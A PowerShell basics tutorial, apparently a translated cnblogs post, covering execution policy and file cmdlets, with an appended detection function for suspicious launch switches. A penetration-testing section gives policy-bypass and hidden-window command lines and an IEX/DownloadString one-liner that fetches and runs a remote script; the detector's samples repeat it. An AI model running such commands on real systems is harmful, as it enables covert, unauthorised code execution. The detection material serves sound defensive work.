PowerShell basics

Windows PowerShell is a command-line shell and scripting environment built into Windows 7 and later versions of the operating system; it gives command-line users and script writers access to the power of the .NET Framework. PowerShell scripts can run directly in memory, and PowerShell can be regarded as an extension of the cmd.exe command prompt.
 
Viewing PowerShell version information
Get-Host or $PSVersionTable.PSVersion
 
Basic concepts
1. The .ps1 file
A PowerShell script is simply a text file containing multiple PowerShell commands, one command per line.
 
2. Execution policy
To prevent malicious scripts from running, PowerShell has an execution policy; by default it is set to the most restrictive setting.
When a PowerShell script cannot be executed, you can use the following cmdlet to determine the current execution policy.
Get-ExecutionPolicy
Restricted: scripts cannot run (the default setting)
RemoteSigned: locally created scripts can run, but scripts downloaded from the Internet cannot, unless they carry a digital signature
AllSigned: scripts run only when they are signed by a trusted publisher
Unrestricted: all scripts are allowed to run
 
The PowerShell execution policy can be set with the following cmdlet
Set-ExecutionPolicy <policy name>
 
3. Running a script
C:\test\1.ps1
.\2.ps1
 
4. Pipeline
The output of one command becomes the input of the next command.
Suppose you want to stop all current processes whose names begin with "p":
get-process p* | stop-process
 
 
I. Basic commands
Taking file operations as an example
1. Create a new directory
New-Item whitecellclub -ItemType Directory
2. Create a new file
New-Item light.txt -ItemType File
3. Delete a directory
Remove-Item whitecellclub
4. Display the contents of a file
Get-Content test.txt
5. Set the text content of a file
Set-Content test.txt -Value "Hello World!"
6. Append content to a file
Add-Content light.txt -Value "i love you"
7. Clear the contents of a file
Clear-Content test.txt
 
II. Execution policy
Get the current execution policy
Get-ExecutionPolicy
The policies are as follows:
Restricted: scripts cannot run (the default)
RemoteSigned: locally created scripts can run, but scripts downloaded from the Internet cannot (except those carrying a digital certificate signature).
AllSigned: scripts run only when they are signed by a trusted publisher.
Unrestricted: all scripts are allowed to run
The PowerShell execution policy can be set with a command of the following form
Set-ExecutionPolicy <Policy name>
 
Type powershell at the command prompt to enter the PowerShell command line, and type help to view the help information.
 
III. Bypassing the policy to run scripts
To run a PowerShell script, the Restricted policy has to be changed to Unrestricted with administrator privileges, so during penetration testing some method is needed to bypass the policy and run the script.

1. Bypassing local permissions to run a script
Upload xxx.ps1 to the target server and run the script locally on the target server from a CMD environment
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2. Bypassing permissions and running the script in a hidden window
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3. Downloading a remote PS1 script with IEX to bypass permissions and run it
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI IEX (New-Object Net.WebClient).DownloadString("xxx.ps1");[Parameters]
 
Explanation of the parameters in the commands above:
ExecutionPolicy Bypass : bypasses the execution security policy. This parameter is very important: by default, PowerShell's security policy does not allow commands and files to be run, and setting this parameter bypasses any such security rule. In penetration testing this parameter is used almost every time a PowerShell script is run.
WindowStyle Hidden : hides the window
NoLogo : starts PowerShell without displaying the copyright banner
NonInteractive (-NonI) : non-interactive mode; PowerShell does not present interactive prompts to the user
NoProfile (-Nop) : the PowerShell console does not load the current user's profile
NoExit : does not exit the shell after execution. This is very important when using scripts such as keyloggers.
By default, PowerShell scripts cannot be run directly; in that case the three methods above can be used to bypass the security policy and run a PowerShell script.
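Because the execution policy is a convenience setting rather than a security boundary, defenders watch for these launch switches in process-creation telemetry (Sysmon Event ID 1, Security Event ID 4688) instead of relying on the policy itself. The following added example, which is not part of the original post, scores a command line against the switches listed above; the function name and the sample command lines are constructed for this demonstration.

```powershell
# Added example: triage a PowerShell process-creation command line for the
# launch switches documented above. Sample inputs below are constructed.
function Get-PowerShellLaunchIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)

    # PowerShell accepts any unambiguous prefix of a switch name, so the
    # patterns also cover short forms such as "-ep bypass" and "-w hidden".
    $patterns = [ordered]@{
        'ExecutionPolicy Bypass' = '-(?:ex\w*|ep)\s+bypass'
        'Hidden window'          = '-w\w*\s+hidden'
        'NoProfile'              = '-nop\w*'
        'NonInteractive'         = '-noni\w*'
        'NoLogo'                 = '-nol\w*'
        'NoExit'                 = '-noe\w*'
        'Remote download + IEX'  = 'downloadstring|\biex\b|invoke-expression'
    }

    # Collect the names of every pattern that matches (case-insensitive).
    $hits = foreach ($name in $patterns.Keys) {
        if ($CommandLine -match "(?i)$($patterns[$name])") { $name }
    }
    $hits = @($hits)

    [pscustomobject]@{
        CommandLine = $CommandLine
        Indicators  = $hits
        Score       = $hits.Count
        # Two or more switches together, or any download-and-execute
        # pattern, is worth an analyst's attention.
        Suspicious  = ($hits.Count -ge 2) -or ($hits -contains 'Remote download + IEX')
    }
}

# Constructed sample command lines (not real telemetry). The third one is a
# benign scheduled task that uses a single switch and should not be flagged.
$samples = @(
    'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1',
    'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/x.ps1'')"',
    'powershell.exe -NoProfile -File C:\scripts\backup.ps1'
)
$samples | ForEach-Object { Get-PowerShellLaunchIndicators -CommandLine $_ } |
    Format-Table Score, Suspicious, Indicators -AutoSize
```

Point the same function at real 4688 or Sysmon command lines (for example via Get-WinEvent) to run it over live telemetry.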
 
 
 

Origin www.cnblogs.com/micr067/p/11717322.html